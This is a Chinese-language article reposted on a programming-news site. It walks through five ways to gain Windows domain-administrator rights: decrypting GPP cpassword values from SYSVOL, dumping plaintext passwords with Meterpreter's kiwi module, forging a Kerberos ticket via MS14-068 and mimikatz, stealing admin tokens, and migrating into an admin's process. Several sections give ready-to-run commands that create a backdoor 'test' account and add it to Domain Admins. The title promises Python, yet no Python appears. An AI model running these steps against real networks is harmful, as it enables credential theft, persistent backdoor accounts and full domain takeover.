广告
返回顶部
首页 > 资讯 > 后端开发 > Python >Python安全获取域管理员权限几种方式操作示例
  • 478
分享到

Python安全获取域管理员权限几种方式操作示例

2024-04-02 19:04:59 478人浏览 独家记忆

Python 官方文档:入门教程 => 点击学习

摘要

目录第1种方式:利用GPP漏洞获取域管理权限第2种方式:获取服务器明文登录密码第3种方式:使用MS14-068漏洞进行提权第4种方式:窃取域管理员令牌第5种方式:进程迁移在大多数情况

在大多数情况下,攻击者可以通过定位域管理员所登录的服务器,利用漏洞获取服务器system权限,找到域管理的账号、进程或是身份验证令牌,从而获取域管理员权限

第1种方式:利用GPP漏洞获取域管理权限

SYSVOL是域内的共享文件夹,用来存放登录脚本、组策略脚本等信息。当域管理员通过组策略修改密码时,在脚本中引入用户密码,就可能导致安全问题。

(1)访问SYSVOL共享文件夹,搜索包含“cpassWord”的XML文件,获取AES加密的密码。

4b72b7c4222da98a8e5825991de85814.png

(2)使用kali自带的gpp-decrypt进行破解,从而获取域账号密码,直接登录域管理员账号获取访问权限。

237666e53154570099b1472ea40cd200.png

第2种方式:获取服务器明文登录密码

使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。


meterpreter > getuid
Server username: BYPASS-E97BA3FC\Administrator
meterpreter > getsystem 
...Got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

加载kiwi模块


load kiwi

列举系统中的明文密码


creds_all

97b51e59dcd9d68f3eb9cb87941650c5.png

第3种方式:使用MS14-068漏洞进行提权

MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。

攻击流程:

第一步:利用MS14-068伪造生成TGT


MS14-068.exe -u bypass@test.com -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d  dc.test.com

8c02d0b76173c974c5484b13d4f2de6c.png

第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书


mimikatz#kerberos::ptc TGT_bypass@test.com.ccache

5b4f11d26249d8fd3dad35394b883804.png

第三步:获取域管理员权限。创建一个 test 账号并加入域管理员组,从而随时可以登录域控主机进行操作。


PsExec.exe \\dc cmd.exe 
// 添加test用户
net user test abc123! /add /domain
// 把 test 用户添加进域管理员组
net group "domain admins"  test /add /domain
// 查看域管理员
net group "domain admins" /domain

第4种方式:窃取域管理员令牌

当有域控账户登陆至服务器时可使用令牌模拟进行渗透取得域控权限。

1、入侵域管理员所在的服务器,窃取域管理员的令牌,从而控制整个域。

a65ff8fa740f2260619f860c45c585cc.png

2、直接在meterpreter shell上执行添加域管理员


add_user test abc123! -h 域控的IP地址
add_group_user "Domain Admins" test -h 域控IP地址

第5种方式:进程迁移

入侵了域管理员所登录的服务器,将进程迁移到域管理员所运行的进程,就可以获得域管理员权限。

1、获取域管理员列表


net group "Domain Admins" /domain

bfd69785de08b8e46907a938839d3f0b.png

2、利用ps找到域管理员(TEST\bypass)所运行的进程,然后将shell进程迁移到域管理员所运行的进程中,成功后就获得了域管理员权限。如下图所示:

53e1f5dc769310202e0938b1538f8fca.png

3、输入shell命令获取OS shell,在本机上使用windows命令添加新的域管理员:


// 添加test用户
net user test admin@123 /add /domain
// 把 test 用户添加进域管理员组
net group "domain admins"  test /add /domain

4、成功添加了域管理员账号test。

1a91aee99283c9716d6038fee51ea8da.png

以上就是python安全获取域管理员权限几种方式操作示例的详细内容,更多关于Python获取域管理员权限方式的资料请关注编程网其它相关文章!

--结束END--

本文标题: Python安全获取域管理员权限几种方式操作示例

本文链接: https://www.lsjlt.com/news/154484.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • Python安全获取域管理员权限几种方式操作示例
    目录第1种方式:利用GPP漏洞获取域管理权限第2种方式:获取服务器明文登录密码第3种方式:使用MS14-068漏洞进行提权第4种方式:窃取域管理员令牌第5种方式:进程迁移在大多数情况...
    99+
    2022-11-12
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作